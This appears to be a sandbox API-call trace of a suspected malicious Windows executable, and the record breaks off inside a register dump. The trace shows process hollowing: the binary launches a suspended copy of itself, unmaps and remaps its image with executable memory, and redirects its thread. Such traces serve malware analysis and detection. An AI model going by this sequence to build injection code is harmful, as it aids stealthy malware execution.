GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.965] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.965] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.965] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.965] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.965] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.965] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.965] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.965] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.965] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.965] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0084.965] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xd9249930, dwHighDateTime=0x1d4be3a)) [0100.487] SetProcessDEPPolicy (dwFlags=0x2) returned 0 [0100.488] GetProcAddress (hModule=0x76540000, lpProcName="VirtualAlloc") returned 0x76551856 [0100.488] VirtualAlloc (lpAddress=0x0, dwSize=0x3ba, flAllocationType=0x1000, flProtect=0x40) returned 0x230000 [0100.489] GetProcAddress (hModule=0x76540000, lpProcName="VirtualAlloc") returned 0x76551856 [0100.489] VirtualAlloc (lpAddress=0x0, dwSize=0x4470a, flAllocationType=0x1000, flProtect=0x40) returned 0x2d0000 [0100.498] GetProcAddress (hModule=0x76540000, lpProcName="VirtualAlloc") returned 0x76551856 [0100.498] GetProcAddress (hModule=0x76540000, lpProcName="ExitProcess") returned 0x76557a10 [0100.498] VirtualAlloc (lpAddress=0x0, dwSize=0x28e00, flAllocationType=0x1000, flProtect=0x40) returned 0x320000 [0100.500] VirtualAlloc (lpAddress=0x0, dwSize=0x1be0, flAllocationType=0x3000, flProtect=0x40) returned 0x240000 [0100.503] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x180e6c, nSize=0x103 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\fulezad.exe")) returned 0x30 [0100.503] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" " [0100.503] CreateProcessW (in: lpApplicationName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe", lpCommandLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x180e14*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x181104 | out: lpCommandLine="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe\" ", lpProcessInformation=0x181104*(hProcess=0x58, hThread=0x54, dwProcessId=0x8bc, dwThreadId=0x8b8)) returned 1 [0100.508] GetThreadContext (in: hThread=0x54, lpContext=0x180b24 | out: lpContext=0x180b24*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x40bb34, Ebp=0x0, Eip=0x777d01c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0100.510] ReadProcessMemory (in: hProcess=0x58, lpBaseAddress=0x7efde008, lpBuffer=0x180e08, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x180e08*, lpNumberOfBytesRead=0x0) returned 1 [0100.510] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x180994 | out: Wow64Process=0x180994) returned 1 [0100.513] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x60 [0100.513] GetFileSize (in: hFile=0x60, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13b740 [0100.513] VirtualAlloc (lpAddress=0x0, dwSize=0x13b740, flAllocationType=0x3000, flProtect=0x4) returned 0x1d40000 [0100.513] ReadFile (in: hFile=0x60, lpBuffer=0x1d40000, nNumberOfBytesToRead=0x13b740, lpNumberOfBytesRead=0x1808cc, lpOverlapped=0x0 | out: lpBuffer=0x1d40000*, lpNumberOfBytesRead=0x1808cc*=0x13b740, lpOverlapped=0x0) returned 1 [0100.563] VirtualAlloc (lpAddress=0x0, dwSize=0x180000, flAllocationType=0x3000, flProtect=0x4) returned 0x1e80000 [0100.573] CloseHandle (hObject=0x60) returned 1 [0100.573] VirtualFree (lpAddress=0x1d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.577] VirtualFree (lpAddress=0x1e80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.581] NtUnmapViewOfSection (ProcessHandle=0x58, BaseAddress=0x400000) returned 0x0 [0100.582] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x180950 | out: Wow64Process=0x180950) returned 1 [0100.585] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x60 [0100.585] GetFileSize (in: hFile=0x60, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13b740 [0100.585] VirtualAlloc (lpAddress=0x0, dwSize=0x13b740, flAllocationType=0x3000, flProtect=0x4) returned 0x1d40000 [0100.585] ReadFile (in: hFile=0x60, lpBuffer=0x1d40000, nNumberOfBytesToRead=0x13b740, lpNumberOfBytesRead=0x180888, lpOverlapped=0x0 | out: lpBuffer=0x1d40000*, lpNumberOfBytesRead=0x180888*=0x13b740, lpOverlapped=0x0) returned 1 [0100.594] VirtualAlloc (lpAddress=0x0, dwSize=0x180000, flAllocationType=0x3000, flProtect=0x4) returned 0x1e80000 [0100.603] CloseHandle (hObject=0x60) returned 1 [0100.603] VirtualFree (lpAddress=0x1d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.607] VirtualFree (lpAddress=0x1e80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.611] NtCreateSection (in: SectionHandle=0x18098c, DesiredAccess=0xe, ObjectAttributes=0x0, MaximumSize=0x180df4, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x18098c*=0x60) returned 0x0 [0100.611] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x180924 | out: Wow64Process=0x180924) returned 1 [0100.615] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0100.615] GetFileSize (in: hFile=0x5c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13b740 [0100.615] VirtualAlloc (lpAddress=0x0, dwSize=0x13b740, flAllocationType=0x3000, flProtect=0x4) returned 0x1d40000 [0100.615] ReadFile (in: hFile=0x5c, lpBuffer=0x1d40000, nNumberOfBytesToRead=0x13b740, lpNumberOfBytesRead=0x18085c, lpOverlapped=0x0 | out: lpBuffer=0x1d40000*, lpNumberOfBytesRead=0x18085c*=0x13b740, lpOverlapped=0x0) returned 1 [0100.620] VirtualAlloc (lpAddress=0x0, dwSize=0x180000, flAllocationType=0x3000, flProtect=0x4) returned 0x1e80000 [0100.629] CloseHandle (hObject=0x5c) returned 1 [0100.629] VirtualFree (lpAddress=0x1d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.634] VirtualFree (lpAddress=0x1e80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.638] NtMapViewOfSection (in: SectionHandle=0x60, ProcessHandle=0x58, BaseAddress=0x180980*=0x400000, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x180928*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x180980*=0x400000, SectionOffset=0x0, ViewSize=0x180928*=0x2b000) returned 0x0 [0100.638] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x180924 | out: Wow64Process=0x180924) returned 1 [0100.641] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0100.641] GetFileSize (in: hFile=0x5c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13b740 [0100.641] VirtualAlloc (lpAddress=0x0, dwSize=0x13b740, flAllocationType=0x3000, flProtect=0x4) returned 0x1d40000 [0100.641] ReadFile (in: hFile=0x5c, lpBuffer=0x1d40000, nNumberOfBytesToRead=0x13b740, lpNumberOfBytesRead=0x18085c, lpOverlapped=0x0 | out: lpBuffer=0x1d40000*, lpNumberOfBytesRead=0x18085c*=0x13b740, lpOverlapped=0x0) returned 1 [0100.646] VirtualAlloc (lpAddress=0x0, dwSize=0x180000, flAllocationType=0x3000, flProtect=0x4) returned 0x1e80000 [0100.655] CloseHandle (hObject=0x5c) returned 1 [0100.655] VirtualFree (lpAddress=0x1d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.659] VirtualFree (lpAddress=0x1e80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.664] NtMapViewOfSection (in: SectionHandle=0x60, ProcessHandle=0xffffffffffffffff, BaseAddress=0x180980*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x180928*=0x2b000, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x180980*=0x350000, SectionOffset=0x0, ViewSize=0x180928*=0x2b000) returned 0x0 [0100.665] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x180968 | out: Wow64Process=0x180968) returned 1 [0100.667] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0100.668] GetFileSize (in: hFile=0x5c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13b740 [0100.668] VirtualAlloc (lpAddress=0x0, dwSize=0x13b740, flAllocationType=0x3000, flProtect=0x4) returned 0x1d40000 [0100.668] ReadFile (in: hFile=0x5c, lpBuffer=0x1d40000, nNumberOfBytesToRead=0x13b740, lpNumberOfBytesRead=0x1808a0, lpOverlapped=0x0 | out: lpBuffer=0x1d40000*, lpNumberOfBytesRead=0x1808a0*=0x13b740, lpOverlapped=0x0) returned 1 [0100.673] VirtualAlloc (lpAddress=0x0, dwSize=0x180000, flAllocationType=0x3000, flProtect=0x4) returned 0x1e80000 [0100.684] CloseHandle (hObject=0x5c) returned 1 [0100.684] VirtualFree (lpAddress=0x1d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.689] VirtualFree (lpAddress=0x1e80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.695] NtWriteVirtualMemory (in: ProcessHandle=0x58, BaseAddress=0x7efde008, Buffer=0x180b04*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x18096c | out: Buffer=0x180b04*, NumberOfBytesWritten=0x18096c*=0x4) returned 0x0 [0100.696] SetThreadContext (hThread=0x54, lpContext=0x180b24*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x401000, Ebp=0x0, Eip=0x777d01c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, 